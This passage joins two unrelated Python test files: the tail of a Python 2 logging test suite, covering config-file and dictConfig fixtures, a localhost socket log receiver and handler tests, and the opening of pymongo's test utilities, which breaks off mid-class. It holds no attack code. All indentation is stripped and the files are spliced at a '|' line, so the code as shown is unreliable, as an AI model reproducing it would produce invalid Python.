# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
def apply_config(self, conf):
file = cStringIO.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
class LogRecordStreamHandler(StreamRequestHandler):
"""Handler for a streaming logging request. It saves the log message in the
TCP server's 'log_output' attribute."""
TCP_LOG_END = "!!!END!!!"
def handle(self):
"""Handle multiple requests - each expected to be of 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally."""
while True:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unpickle(chunk)
record = logging.makeLogRecord(obj)
self.handle_log_record(record)
def unpickle(self, data):
return cPickle.loads(data)
def handle_log_record(self, record):
# If the end-of-messages sentinel is seen, tell the server to
# terminate.
if self.TCP_LOG_END in record.msg:
self.server.abort = 1
return
self.server.log_output += record.msg + "\n"
class LogRecordSocketReceiver(ThreadingTCPServer):
"""A simple-minded TCP socket-based logging receiver suitable for test
purposes."""
allow_reuse_address = 1
log_output = ""
def __init__(self, host='localhost',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler):
ThreadingTCPServer.__init__(self, (host, port), handler)
self.abort = False
self.timeout = 0.1
self.finished = threading.Event()
def serve_until_stopped(self):
while not self.abort:
rd, wr, ex = select.select([self.socket.fileno()], [], [],
self.timeout)
if rd:
self.handle_request()
# Notify the main thread that we're about to exit
self.finished.set()
# close the listen socket
self.server_close()
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.tcpserver = LogRecordSocketReceiver(port=0)
self.port = self.tcpserver.socket.getsockname()[1]
self.threads = [
threading.Thread(target=self.tcpserver.serve_until_stopped)]
for thread in self.threads:
thread.start()
self.sock_hdlr = logging.handlers.SocketHandler('localhost', self.port)
self.sock_hdlr.setFormatter(self.root_formatter)
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.tcpserver.abort = True
del self.tcpserver
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
for thread in self.threads:
thread.join(2.0)
finally:
BaseTest.tearDown(self)
def get_output(self):
"""Get the log output as received by the TCP server."""
# Signal the TCP receiver and wait for it to terminate.
self.root_logger.critical(LogRecordStreamHandler.TCP_LOG_END)
self.tcpserver.finished.wait(2.0)
return self.tcpserver.log_output
@unittest.skipIf(os.name=='java' and os._name=='nt',
'Blocks test completion on Jython Windows.')
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
logger.debug("eggs")
self.assertEqual(self.get_output(), "spam\neggs\n")
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fn = tempfile.mktemp(".log")
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn)
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn)
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = u'\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = cStringIO.StringIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, '\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
try:
warnings.filterwarnings("always", category=UserWarning)
file = cStringIO.StringIO()
h = logging.StreamHandler(file)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = file.getvalue()
h.close()
self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)
#See if an explicit file uses the original implementation
file = cStringIO.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
file, "Dummy line")
s = file.getvalue()
file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
finally:
logging.captureWarnings(False)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
#Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
#Nothing will be output since both handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config13)
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text):
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
def test_listen_config_10_ok(self):
with captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertTrue(c1 is logging.getLogger('xyz'))
self.assertTrue(c2 is logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertTrue(c1 is logging.getLogger('abc.def'))
self.assertTrue(c2 is logging.getLogger('abc.def.ghi'))
self.assertTrue(c2 is c3)
class HandlerTest(BaseTest):
@unittest.skipIf(os.name == 'nt' or (os.name == 'java' and os._name == 'nt'),
'WatchedFileHandler not appropriate for Windows.')
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
h.handle(r)
finally:
remover.join()
try:
h.close()
except ValueError:
pass
if os.path.exists(fn):
os.unlink(fn)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
run_unittest(BuiltinLevelsTest, BasicFilterTest,
CustomLevelsAndFiltersTest, MemoryHandlerTest,
ConfigFileTest, SocketHandlerTest, MemoryTest,
EncodingTest, WarningsTest, ConfigDictTest, ManagerTest,
ChildLoggerTest, HandlerTest)
if __name__ == "__main__":
test_main()
|
utils.py
|
# Copyright 2012-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for testing pymongo
"""
import collections
import contextlib
import functools
import os
import re
import sys
import threading
import time
import warnings
from collections import defaultdict
from functools import partial
from bson import json_util, py3compat
from bson.objectid import ObjectId
from pymongo import (MongoClient,
monitoring, read_preferences)
from pymongo.errors import ConfigurationError, OperationFailure
from pymongo.monitoring import _SENSITIVE_COMMANDS, ConnectionPoolListener
from pymongo.pool import PoolOptions
from pymongo.read_concern import ReadConcern
from pymongo.read_preferences import ReadPreference
from pymongo.server_selectors import (any_server_selector,
writable_server_selector)
from pymongo.write_concern import WriteConcern
from test import (client_context,
db_user,
db_pwd)
IMPOSSIBLE_WRITE_CONCERN = WriteConcern(w=1000)
class WhiteListEventListener(monitoring.CommandListener):
def __init__(self, *commands):
self.commands = set(commands)
self.results = defaultdict(list)
def started(self, event):
if event.command_name in self.commands:
self.results['started'].append(event)
def succeeded(self, event):
if event.command_name in self.commands:
self.results['succeeded'].append(event)
def failed(self, event):
if event.command_name in self.commands:
self.results['failed'].append(event)
class CMAPListener(ConnectionPoolListener):
def __init__(self):
self.events = []
def reset(self):
self.events = []
def add_event(self, event):
self.events.append(event)
def event_count(self, event_type):
return len([event for event in self.events[:]
if isinstance(event, event_type)])
def connection_created(self, event):
self.add_event(event)
def connection_ready(self, event):
self.add_event(event)
def connection_closed(self, event):
self.add_event(event)
def connection_check_out_started(self, event):
self.add_event(event)
def connection_check_out_failed(self, event):
self.add_event(event)
def connection_checked_out(self, event):
self.add_event(event)
def connection_checked_in(self, event):
self.add_event(event)
def pool_created(self, event):
self.add_event(event)
def pool_cleared(self, event):
self.add_event(event)
def pool_closed(self, event):
self.add_event(event)
class EventListener(monitoring.CommandListener):
def __init__(self):
self.results = defaultdict(list)
def started(self, event):
self.results['started'].append(event)
def succeeded(self, event):
self.results['succeeded'].append(event)
def failed(self, event):
self.results['failed'].append(event)
def started_command_names(self):
"""Return list of command names started."""
return [event.command_name for event in self.results['started']]
def reset(self):
"""Reset the state of this listener."""
self.results.clear()
class OvertCommandListener(EventListener):
"""A CommandListener that ignores sensitive commands."""
